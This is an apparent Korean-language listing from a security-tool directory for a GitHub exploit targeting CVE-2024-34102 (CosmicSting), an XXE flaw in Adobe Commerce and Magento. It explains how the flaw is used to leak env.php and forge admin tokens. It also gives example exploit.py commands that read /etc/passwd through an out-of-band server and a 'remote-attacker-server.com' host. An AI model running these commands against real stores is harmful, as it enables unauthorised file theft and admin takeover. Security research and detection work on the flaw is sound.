Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento — CosmicSting: Adobe Commerce 및 Magento에서 중요한 인증되지 않은 XXE 취약점 (CVE-2024-34102) | Kitploit
도구/GitHubGitHub/jakabakos/cve-2024-34102-cosmicsting-xxe-in-adobe-commerce-and-magento
Vulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationInformation GatheringPenetration Testing
GitHubjakabakos/cve-2024-34102-cosmicsting-xxe-in-adobe-commerce-and-magento

CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento

CosmicSting: Adobe Commerce 및 Magento에서 중요한 인증되지 않은 XXE 취약점 (CVE-2024-34102)

저장소 보기
9112년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CosmicSting: Adobe Commerce 및 Magento의 중요 인증되지 않은 XXE 취약점 (CVE-2024-34102)

CVE-2024-34102는 Adobe Commerce 및 Magento에서 중첩 역직렬화를 부적절하게 처리하여 발생하는 심각한 보안 결함입니다. 이 취약점을 통해 공격자는 역직렬화 과정에서 XML 외부 엔터티(XXE)를 악용할 수 있으며, 잠재적으로 원격 코드 실행이 가능합니다. 간단히 말해, 공격자는 악의적인 JSON 페이로드를 구성하여 애플리케이션이 역직렬화할 때 의도하지 않은 속성이나 동작을 가진 객체를 인스턴스화하게 합니다. 이는 다양한 보안 위험을 초래할 수 있습니다.

이 취약점을 악용하면 공격자는 REST API, GraphQL API 또는 SOAP API에 대해 인증되지 않은 관리자 액세스 권한을 얻을 수 있으며, 데이터 도난, 서비스 중단, 영향을 받는 시스템의 완전한 손상으로 이어질 수 있습니다. 이 취약점은 인증에 사용되는 암호화 키를 포함하는 app/etc/env.php와 같은 민감한 파일을 유출할 수 있기 때문에 상당한 위험을 초래합니다. 공격자는 이를 악용하여 관리자 토큰을 위조하고 권한 있는 사용자로 Magento의 API를 조작할 수 있습니다.

또한 CVE-2024-34102는 PHP 필터 체인 익스플로잇(CVE-2024-2961)과 같은 다른 취약점과 연계되어 원격 코드 실행(RCE)으로 이어질 수 있습니다. XML 외부 엔터티(XXE) 취약점의 광범위한 영향으로 인해 공격자는 외부 소스의 데이터를 검색하고 조작할 수 있어 손상된 시스템에 대한 잠재적 영향이 더욱 커집니다.

사용법

root@kitploit:~
usage: exploit.py [-h] --target TARGET --read-file READ_FILE [--oob-server OOB_SERVER] [--host-server HOST_SERVER]

Exploit script for XXE vulnerability

options:
  -h, --help            show this help message and exit
  --target TARGET, -t TARGET
                        Target URL (http(s)://ip[:port])
  --read-file READ_FILE, -r READ_FILE
                        File to read from the remote host
  --oob-server OOB_SERVER, -ob OOB_SERVER
                        OOB server URL (http(s)://ip[:port])
  --host-server HOST_SERVER, -hs HOST_SERVER
                        Host server URL (http(s)://ip[:port])

예제

root@kitploit:~
# Run with local attacker server and local OOB server
python3 exploit.py -t https://magento.test -r "/etc/passwd"

# Run with remote attacker server and remote OOB server
python3 exploit.py -t https://magento.test --oob-server http://xxx.oasitfy.com --host-server https://remote-attacker-server.com -r "/etc/passwd"

# Detection
python3 detect.py -t https://magento.test

면책 조항

이 익스플로잇 스크립트는 연구 및 효과적인 방어 기술 개발 목적으로만 제작되었습니다. 악의적이거나 승인되지 않은 활동에 사용하기 위한 것이 아닙니다. 작성자와 스크립트 소유자는 이 소프트웨어의 오용이나 어떤 손해에 대한 책임이나 의무를 부인합니다. 사용자는 관련 법률 및 규정에 따라 이 소프트웨어를 책임감 있게 사용해야 합니다. 책임감 있게 사용하십시오.

도구 다운로드